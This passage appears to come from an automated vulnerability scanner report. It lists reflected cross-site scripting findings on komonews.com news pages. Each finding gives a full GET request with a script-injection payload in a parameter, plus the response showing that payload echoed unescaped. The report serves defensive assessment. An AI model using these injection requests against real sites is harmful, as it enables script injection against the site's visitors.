<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Bieber fan ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116665019.html?b6f03"><script>alert(1)</script>7c279062389=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.426. http://www.komonews.com/news/entertainment/116680394.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/entertainment/116680394.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd4a4"><script>alert(1)</script>464baf18d3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/entertainment/116680394.html?fd4a4"><script>alert(1)</script>464baf18d3a=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u38-b3 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:21 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 54806
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
1.427. http://www.komonews.com/news/entertainment/116692424.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/entertainment/116692424.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fb27"><script>alert(1)</script>91a41cb9407 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/entertainment/116692424.html?5fb27"><script>alert(1)</script>91a41cb9407=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r7-u31-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:11 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 54160
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Chris Brow ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116692424.html?5fb27"><script>alert(1)</script>91a41cb9407=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.428. http://www.komonews.com/news/entertainment/116704174.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/entertainment/116704174.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da2f4"><script>alert(1)</script>6d803cea48f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/entertainment/116704174.html?da2f4"><script>alert(1)</script>6d803cea48f=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u38-b3 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 53896
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
1.429. http://www.komonews.com/news/entertainment/116707059.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/entertainment/116707059.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26483"><script>alert(1)</script>493e37d1789 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/entertainment/116707059.html?26483"><script>alert(1)</script>493e37d1789=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:03 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 40489
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Photos: Fu ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116707059.html?26483"><script>alert(1)</script>493e37d1789=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d053a"><script>alert(1)</script>160ff22fdb5 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/entertainment/116707059.html?ref=guiltypleasuresd053a"><script>alert(1)</script>160ff22fdb5 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u38-b3 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:01 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 40492
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Photos: Fu ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116707059.html?ref=guiltypleasuresd053a"><script>alert(1)</script>160ff22fdb5" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.431. http://www.komonews.com/news/entertainment/116710289.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/entertainment/116710289.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7a1c"><script>alert(1)</script>b13f5ec2d89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/entertainment/116710289.html?c7a1c"><script>alert(1)</script>b13f5ec2d89=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u38-b3 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:05 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 53311
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Alyssa Mil ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116710289.html?c7a1c"><script>alert(1)</script>b13f5ec2d89=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.432. http://www.komonews.com/news/entertainment/116737029.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/entertainment/116737029.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1f63"><script>alert(1)</script>ccd130576bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/entertainment/116737029.html?b1f63"><script>alert(1)</script>ccd130576bf=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:07 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 55468
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Lena Horne ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116737029.html?b1f63"><script>alert(1)</script>ccd130576bf=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f910"><script>alert(1)</script>824444c91c was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/entertainment/116737029.html?ref=guiltypleasures8f910"><script>alert(1)</script>824444c91c HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:01 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 55484
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Lena Horne ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116737029.html?ref=guiltypleasures8f910"><script>alert(1)</script>824444c91c" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.434. http://www.komonews.com/news/entertainment/116737724.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/entertainment/116737724.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edb6c"><script>alert(1)</script>e5ad59b8bc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/entertainment/116737724.html?edb6c"><script>alert(1)</script>e5ad59b8bc5=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:11 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 57439
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Judge to L ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116737724.html?edb6c"><script>alert(1)</script>e5ad59b8bc5=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd82f"><script>alert(1)</script>8b9a4694de9 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/entertainment/116737724.html?ref=guiltypleasuresfd82f"><script>alert(1)</script>8b9a4694de9 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u38-b3 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:58 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 57456
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Judge to L ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116737724.html?ref=guiltypleasuresfd82f"><script>alert(1)</script>8b9a4694de9" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.436. http://www.komonews.com/news/health/116753189.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/health/116753189.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a076"><script>alert(1)</script>1bb743a14e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/health/116753189.html?4a076"><script>alert(1)</script>1bb743a14e1=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r7-u31-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:36 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 54572
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
21,000 had ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/health/116753189.html?4a076"><script>alert(1)</script>1bb743a14e1=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.437. http://www.komonews.com/news/local/116231884.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/local/116231884.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 483eb"><script>alert(1)</script>8407c6c48ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/local/116231884.html?483eb"><script>alert(1)</script>8407c6c48ab=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u7-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:43 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 54178
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Spokane ma ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116231884.html?483eb"><script>alert(1)</script>8407c6c48ab=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.438. http://www.komonews.com/news/local/116509853.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/local/116509853.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2faa"><script>alert(1)</script>b78b2637fb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/local/116509853.html?d2faa"><script>alert(1)</script>b78b2637fb2=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u24-b7 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:43 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 56252
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
With no bu ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116509853.html?d2faa"><script>alert(1)</script>b78b2637fb2=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.439. http://www.komonews.com/news/local/116694614.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/local/116694614.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac35f"><script>alert(1)</script>23fa83b97d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/local/116694614.html?ac35f"><script>alert(1)</script>23fa83b97d8=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r1-u24-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:31 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 54865
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Police off ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116694614.html?ac35f"><script>alert(1)</script>23fa83b97d8=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.440. http://www.komonews.com/news/local/116703604.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/local/116703604.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26e1a"><script>alert(1)</script>2036797cb5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/local/116703604.html?tab=video&26e1a"><script>alert(1)</script>2036797cb5c=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
